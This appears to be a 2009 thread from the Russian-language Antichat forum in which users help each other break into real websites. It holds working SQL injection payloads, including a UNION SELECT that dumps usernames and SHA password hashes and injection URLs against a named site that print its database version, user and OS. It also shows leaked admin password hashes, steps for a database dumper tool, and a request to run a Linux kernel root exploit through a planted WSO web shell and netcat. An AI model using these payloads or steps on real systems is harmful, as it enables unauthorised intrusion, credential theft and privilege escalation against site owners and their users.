ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2009, 18:56
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Сообщение от f1re
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс? Сипт может спокойно выводить структуру базы и данные из неё.
Fields user_id:user_pwd
[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4
Вот что выводит.
|
|
|
03.07.2009, 19:02
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от RedX
На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод.. попробуй так(но так, выведутся только несколько первых записей) -1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_p ass_hash) separator 0x20), 6 from realmd.account -- - А чтобы остальные вывести, пробуй substring, может прокатить.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
03.07.2009, 19:07
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
Провел на форуме:
11978
Репутация:
0
|
|
Сообщение от RedX
Сипт может спокойно выводить структуру базы и данные из неё.
Fields user_id:user_pwd
[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4
Вот что выводит.
Рискуя показаться тупее, чем есть, скажу, что Сипт у меня вообще не находит там дырок. Можешь пошагово расписать свои действия?
|
|
|
|
03.07.2009, 19:16
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Сообщение от AFoST
попробуй так(но так, выведутся только несколько первых записей) -1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_p ass_hash) separator 0x20), 6 from realmd.account -- - А чтобы остальные вывести, пробуй substring, может прокатить. Это выводит не больше чем 1024 символа, тем более проблему именно с заменой части хеша на ***** не решает..
ЗЫ Скрин
|
|
|
|
03.07.2009, 19:26
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Сообщение от f1re
Рискуя показаться тупее, чем есть, скажу, что Сипт у меня вообще не находит там дырок. Можешь пошагово расписать свои действия?
Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data..
СКРИН
|
|
|
|
03.07.2009, 19:44
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 4
Провел на форуме:
11978
Репутация:
0
|
|
Сообщение от RedX
Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data..
СКРИНПесня не кончается. Get Quantity выполняется нормально, а вот на следующем пункте, после отправки двух запросов, Сипт затыкается. Скрин
|
|
|
|
03.07.2009, 20:11
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Хм, по идее должно работать..
|
|
|
|
03.07.2009, 21:34
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
http://www.rsci.ru/company/innov/?Number=10'
как слепая не крутится, как обычная - тоже... помогите  |
|
|
|
03.07.2009, 21:45
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.rsci.ru/katalog/second.php?catID=2&PID=-108+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3/*
Database Version: 4.0.27
Database name: rsci
User name: rsci@zvm8
Os : zportbld-freebsd6.3
|
|
|
|
03.07.2009, 21:47
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от nemaniak
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
помогите пожалуйста, уважаемые ачатовцы.
Есть сервак с линем Linux Kernel 2.6.29 и нанём shell WSO2.
Есть локальный сплоит для поднятия рута на С++.
http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29
Я кагбы новинький в сплоитах, плиз, напишити по конреней дейсвия для его запуска.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
